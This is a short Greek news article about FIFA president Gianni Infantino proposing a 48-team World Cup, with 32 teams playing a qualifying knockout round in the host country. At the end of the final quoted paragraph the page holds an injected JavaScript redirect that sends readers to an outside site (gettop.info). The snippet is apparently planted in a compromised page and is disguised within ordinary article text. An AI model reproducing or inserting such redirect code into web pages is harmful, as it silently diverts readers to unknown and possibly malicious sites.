Μουντιάλ με 48 ομάδες προτείνει ο Ινφαντίνο

0
3

 

Ο πρόεδρος της FIFA Τζάνι Ινφαντίνο πρότεινε Παγκόσμιο Πρωτάθλημα Ποδοσφαίρου με συμμετοχη 48 ομάδων. Σύμφωνα με τους προγραμματισμούς του, οι 16 από αυτές τις ομάδες θα αποκλειστούν έπειτα από έναν νοκ άουτ αγώνα και η ποδοσφαιρική διοργάνωση θα συνεχιστεί όπως και σήμερα με 32 ομάδες σε ομίλους και στη συνέχεια μονοί νοκ άουτ αγώνες.

Μιλώντας σε εκδήλωση σε πανεπιστήμιο της Μπογκοτά, ο Ινφαντίνο είπε ότι η τελική απόφαση θα ληφθεί από το Συμβούλιο της FIFA τον Ιανουάριο.

«Η κεντρική ιδέα είναι ότι οι 16 ομάδες θα προκριθούν απευθείας στη φάση των ομίλων και οι άλλες 32 θα παίξουν σε ένα προκριματικό στάδιο για τις υπόλοιπες 16 θέσεις, στη χώρα διεξαγωγής του Παγκοσμίου Κυπέλλου.

Αυτό σημαίνει ότι θα συνεχίσουμε κανονικά με 32 ομάδες, αλλά στο «πάρτι» θα έχουν λάβει μέρος 48. Η ιδέα της FIFA είναι η ανάπτυξη του ποδοσφαίρου σε ολόκληρο τον κόσμο, και το Παγκόσμιο Κύπελλο είναι η μεγαλύτερη εκδήλωση. Είναι κάτι περισσότερο από μια διοργάνωση, είναι μια κοινωνική εκδήλωση», σημείωσε ο κ. Ινφαντίνο. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here